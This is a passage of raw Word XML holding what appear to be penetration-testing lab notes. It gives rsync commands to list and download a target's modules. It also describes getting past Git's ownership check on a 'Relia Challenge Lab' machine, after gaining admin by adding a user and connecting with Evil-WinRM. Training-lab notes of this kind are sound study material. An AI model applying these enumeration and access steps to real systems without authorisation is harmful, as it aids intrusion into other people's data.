    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031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1C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2zqe5hriripz" w:id="442"/>
      <w:bookmarkEnd w:id="442"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync is a powerful and versatile command-line tool for efficiently </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copying and synchronizing files and directories between two locations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These locations can be on the same system or across a network, making rsync widely used for backups, mirroring, and file transfers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating rsync:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync &lt;target-ip&gt;::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will find all publicly available modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The most common module is "public"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloading files from rsync to local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync -av &lt;target-ip&gt;::[module_name] /local/directory/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/local/directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with "." to move files to current directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D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1D4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hxuokffjarqm" w:id="443"/>
      <w:bookmarkEnd w:id="443"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uf6dojytz2w9" w:id="444"/>
      <w:bookmarkEnd w:id="444"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to access git repo that is not owned by you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.249 machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we saw a directory with a hidden .git directory, meaning that it's a git repo. But when we tried running</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> git status</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we got this error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*Evil-WinRM* PS C:\staging&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git.exe : fatal: detected dubious ownership in repository at 'C:/staging'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    + CategoryInfo          : NotSpecified: (fatal: detected...at 'C:/staging':String) [], RemoteException</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    + FullyQualifiedErrorId : NativeCommandError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031DF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'C:/staging/.git' is owned by:  'S-1-5-21-464543310-226837244-3834982083-1003'but the current user is:  'S-1-5-21-464543310-226837244-3834982083-1005'To add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because we got admin by adding an admin user and logging in via winrm. So, this new admin user is not the owner of the git repo and can't access it. So, we have multiple ways around this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Tell Git this repo is safe (the only method I've tried so far) (no privileges needed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you just want to use the repo as-is, you can whitelist the path:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git config --global --add safe.directory C:/staging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now Git will trust that repo regardless of ownership.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Take ownership of the repo (high privileges needed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you’d rather fix ownership to match your current user (instead of bypassing the check), you can:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">takeown /F C:\staging\.git /R /D Y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">icacls C:\staging\.git /setowner "USERNAME" /T</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "USERNAME" with the account you’re in with Evil-WinRM. This way the repo actually belongs to you.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031EF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Copy the repo out (quick workaround) (no privileges needed)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If permissions are messy, another trick is just:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xcopy C:\staging C:\Users\Public\staging /E /H /I</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd C:\Users\Public\staging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git status</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now it’s under your user profile and Git won’t complain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F6">
      <w:pPr>
        <w:rPr/>
